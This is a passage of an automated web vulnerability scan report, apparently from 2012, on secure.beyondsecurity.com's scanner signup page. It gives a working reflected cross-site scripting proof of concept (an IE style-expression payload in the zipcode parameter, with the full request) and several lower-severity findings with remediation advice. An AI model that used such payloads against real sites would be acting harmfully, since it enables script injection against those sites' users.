Path:   /vulnerability-scanner-signup

Issue detail

The value of the zipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db1c5"style%3d"x%3aexpression(alert(1))"50dfc64f77abf29e7 was submitted in the zipcode parameter. This input was echoed as db1c5"style="x:expression(alert(1))"50dfc64f77abf29e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=db1c5"style%3d"x%3aexpression(alert(1))"50dfc64f77abf29e7&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="zipcode" value="db1c5"style="x:expression(alert(1))"50dfc64f77abf29e7">
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

POST /vulnerability-scanner-signup?fromstep=1& HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal
Content-Type: application/x-www-form-urlencoded
Content-Length: 326


c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&c
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</script>

<form name="SignupStep1" action="/vulnerability-scanner-signup?fromstep=2" method="post">
<input type="hidden" name="c" value="" />
...[SNIP]...
<td><input type="password" name="password" size="30" onkeypress="javascript:return noEnter(event);"></td>
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

POST /vulnerability-scanner-signup?fromstep=1& HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal
Content-Type: application/x-www-form-urlencoded
Content-Length: 326


c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&c
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<!-- Step 2 Mar 28 BP -->

<script language="javascript" src='https://ssl.google-analytics.com/ga.js'></script>
...[SNIP]...
<a href="http://www.sitetrustnetwork.com/directory/report.php?id=628" target="_blank">
<img src="https://www.sitetrustnetwork.com/seals/92x48_am_cv.gif" width="92" height="48" alt="SiteTrust Network Approved" border="0" title="Beyond Security, Inc. is an approved SiteTrust Network website. Click here to verify." /></a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. https://secure.beyondsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: secure.beyondsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:13:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<!-- july 7 BP -->

<script language="javascript" src='https://ssl.google-analytics.com/ga.js'></script>
...[SNIP]...

4.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vulnerability-scanner-signup HTTP/1.1
Host: secure.beyondsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:13:30 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<!-- july 7 BP -->

<script language="javascript" src='https://ssl.google-analytics.com/ga.js'></script>
...[SNIP]...

5. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. https://secure.beyondsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: secure.beyondsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:13:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<A HREF="mailto:Support@BeyondSecurity.com">Support@BeyondSecurity.com</A>
...[SNIP]...

5.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The following email address was disclosed in the response:

Request

POST /vulnerability-scanner-signup?fromstep=2 HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/vulnerability-scanner-signup?fromstep=1&
Content-Type: application/x-www-form-urlencoded
Content-Length: 340


c=&step=3&type=advanced&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&char
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 20041
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="email" value="rft34efr43tf@rr.com" />
...[SNIP]...

5.3. https://secure.beyondsecurity.com/vulnerability-scanner-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The following email address was disclosed in the response:

Request

GET /vulnerability-scanner-signup HTTP/1.1
Host: secure.beyondsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:13:30 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<A HREF="mailto:Support@BeyondSecurity.com">Support@BeyondSecurity.com</A>
...[SNIP]...

6. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


6.1. https://secure.beyondsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /

Request

GET / HTTP/1.1
Host: secure.beyondsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:13:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...

6.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Request

GET /vulnerability-scanner-signup?step=1 HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.beyondsecurity.com/vulnerability-scanner.html
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:05:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7873
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

...........=.s.6.?'3..pl.l.Y..p...O...W;q#%....."!.1E.|XQ{.......dZ..Lru;ID.X,......_N^u..\..I4u......]fTj.w.n.v.?a...y...............N_...D.P..f...Y..q.....a....Y.2-.Vd...<=.K..l..A5....T....0u....
...[SNIP]...

7. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. https://secure.beyondsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.beyondsecurity.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /?from=seal HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.beyondsecurity.com/website-security-seal.html
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:14:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7873
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

...........=.s.6.?'3..pl.l.Y..p...O...W;q#%....."!.1E.|XQ{.......dZ..Lru;ID.X,......_N^u..\..I4u......]fTj.w.n.v.?a...y...............N_...D.P..f...Y..q.....a....Y.2-.Vd...<=.K..l..A5....T....0u....
...[SNIP]...

7.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /vulnerability-scanner-signup?step=1 HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.beyondsecurity.com/vulnerability-scanner.html
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:05:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7873
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

...........=.s.6.?'3..pl.l.Y..p...O...W;q#%....."!.1E.|XQ{.......dZ..Lru;ID.X,......_N^u..\..I4u......]fTj.w.n.v.?a...y...............N_...D.P..f...Y..q.....a....Y.2-.Vd...<=.K..l..A5....T....0u....
...[SNIP]...

Report generated by XSS.Cx at Sun Jan 29 07:58:51 CST 2012.